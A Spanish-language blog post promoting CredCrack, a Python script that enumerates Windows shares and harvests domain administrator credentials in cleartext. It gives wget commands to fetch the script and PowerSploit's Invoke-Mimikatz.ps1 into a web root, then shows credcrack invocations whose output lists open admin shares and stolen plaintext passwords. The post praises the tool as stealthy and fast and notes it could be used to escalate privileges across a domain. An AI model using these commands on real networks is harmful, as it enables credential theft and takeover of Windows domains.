CredCrack: Domain administrator credentials

Jonathan Broche nos presenta un “Script” en “Python” el cuál podemos utilizar para – enumerar los recursos compartidos y recopilar rápidamente las credenciales  de los “servidores” (windows) de una red. 

Captura: Jonathan Broche (cuenta "Twitter") ;)
Captura: Jonathan Broche (cuenta “Twitter“) 😉

Se podría decir que es “sigilosocargando las “credenciales” en memoria sin escribir en el disco y también es bastante rápido.

A continuación, en el siguiente vídeo, observamos – como se “obtienen” las credenciales de administrador – de dominio en tan sólo unos pocos segundos }:O..


CredCrack, BLOG - 2

CredCrack, BLOG - 3

CredCrack, BLOG - 4

CredCrack, BLOG - 5

CredCrack, BLOG - 6

CredCrack, BLOG - 7

CredCrack, BLOG - 8

CredCrack, BLOG - 9

Para usarCredCrack” sólo tenemos que descargar el “script” de GitHub;

Nota: CredCrack funciona con las herramientas nativas de Kali Linux.. ;)

CredCrack, BLOG - 10

-) wget https://raw.githubusercontent.com/gojhonny/CredCrack/master/credcrack.py

Despuésdescargar en el directorio /var/www el “Script” en Powershell InvokeMimikatz.ps1 de Joe Bialek; 

Captura: Joe Bialek (Perfil "Twitter") :)
Captura: Joe Bialek (PerfilTwitter“) 🙂
-) wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 -O /var/www/Invoke-Mimikatz.ps1

CredCrack, BLOG - 12

./credcrack.py -r 192.168.1.100 -d acme -u bob -es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------

 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

CredCrack, BLOG - 13

./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       


[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Se podría hacer prácticamente lo mismo con otras herramientas, pero (no cabe ninguna duda) de que este “Script” nos va a facilitar mucho las cosas. Pero, para que funcione y podamos obtener las “passwords” (en claro) tendremos que ejecutarla – con un administrador local -, algo que se puede comprobar antes al enumerar los recursos compartidos (-es).

Nota: Esto podría servir para "elevar privilegios" a nivel de dominio o tal vez haber conseguido un "prompt" con un usuario con permisos o reutilizar un "hash", etc.

CredCrack, BLOG - 14

Nota: Evitar "Mimikatz" y técnicas "Pass-the-hash":

CredCrack, BLOG - 15

CredCrack, BLOG - 16

CredCrack, BLOG - 17

CredCrack, BLOG - 18

CredCrack, BLOG - 19

CredCrack, BLOG - 20

CredCrack, BLOG - 21

CredCrack, BLOG - 22


CredCrack, BLOG - 23

Github: CredCrack

CredCrack, BLOG - 24

Salu2


TonyHAT - 251

Anuncios

Un comentario en “CredCrack: Domain administrator credentials”

Responder

Por favor, inicia sesión con uno de estos métodos para publicar tu comentario:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s